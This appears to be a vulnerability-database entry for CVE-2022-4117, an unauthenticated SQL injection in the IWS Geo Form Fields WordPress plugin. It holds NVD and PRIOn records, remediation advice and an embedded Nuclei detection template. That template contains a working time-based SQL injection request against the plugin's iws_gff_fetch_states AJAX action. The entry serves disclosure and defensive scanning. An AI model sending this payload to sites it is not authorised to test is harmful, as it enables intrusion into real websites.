Description
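The IWS Geo Form Fields WordPress plugin (`iws-geo-form-fields`), through version 1.0, does not properly escape a request parameter before using it in a SQL statement. The vulnerable code is reached via an AJAX action that is available to unauthenticated users, so the SQL injection requires no login (CVE-2022-4117; classified as CWE-89 in the scanner template below, while the NVD record's `cwe` list is empty). The records below score it 7.5 (HIGH) under CVSS v2 and 9.8 (CRITICAL) under CVSS v3.1. The template's remediation text refers to a version >=1.1, but the other records on this page list only 1.0 and earlier as affected and name no fixed release, so confirm that a patched version exists before relying on an update. Otherwise, deactivate the plugin or block unauthenticated requests to its `iws_gff_fetch_states` AJAX action, and review web server logs for requests to that action.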
Affected Software
`iws-geo-form-fields` (WordPress plugin), versions up to and including 1.0.
Related
{"id": "PRION:CVE-2022-4117", "vendorId": null, "type": "prion", "bulletinFamily": "NVD", "title": "Sql injection", "description": "The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.", "published": "2022-12-26T13:15:00", "modified": "2023-01-04T21:30:00", "epss": [{"cve": "CVE-2022-4117", "epss": 0.04023, "percentile": 0.91123, "modified": "2023-11-20"}], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}}, "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-4117", "reporter": "PRIOn knowledge base", "references": ["https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193"], "cvelist": ["CVE-2022-4117"], "immutableFields": [], "lastseen": "2023-11-20T23:51:04", "viewCount": 5, "enchantments": {"score": {"value": 9.8, "uncertanity": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-4117"]}, {"type": "nuclei", "idList": ["NUCLEI:CVE-2022-4117"]}]}, "vulnersScore": 9.8}, "_state": 
{"score": 1700524477, "dependencies": 1700524371}, "_internal": {"score_hash": "b49ceb98f58f7dbd9c838090a8ebb242"}, "affectedSoftware": [{"version": "1.0", "operator": "le", "name": "iws-geo-form-fields"}], "vendor_cvss2": {"score": "7.5", "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vendor_cvss3": {}}
{"cve": [{"lastseen": "2023-12-06T16:31:21", "description": "The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-26T13:15:00", "type": "cve", "title": "CVE-2022-4117", "cwe": [], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4117"], "modified": "2023-11-07T03:56:00", "cpe": ["cpe:/a:iws-geo-form-fields_project:iws-geo-form-fields:1.0"], "id": "CVE-2022-4117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:1.0:*:*:*:*:wordpress:*:*"]}], "nuclei": [{"lastseen": "2023-12-06T22:44:09", "description": "\n WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-18T00:00:00", "type": "nuclei", "title": "WordPress IWS Geo Form Fields <=1.0 - SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4117"], "modified": "2023-12-06T00:00:00", "id": "NUCLEI:CVE-2022-4117", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2022/CVE-2022-4117.yaml", "sourceData": "id: CVE-2022-4117\n\ninfo:\n name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193\n - https://wordpress.org/plugins/iws-geo-form-fields/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4117\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4117\n cwe-id: CWE-89\n epss-score: 0.03393\n epss-percentile: 0.90397\n cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: iws-geo-form-fields_project\n product: iws-geo-form-fields\n framework: wordpress\n tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")'\n condition: and\n# digest: 4a0a00473045022100c768267cd077c5215d15b4b86b1614e9bebdec9d8a439dbdcda19b3b81d0f90c0220645ca6745dcf3733d61dce62510c538ac9b80fb5111a26315e8d65a1a1153ebd:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}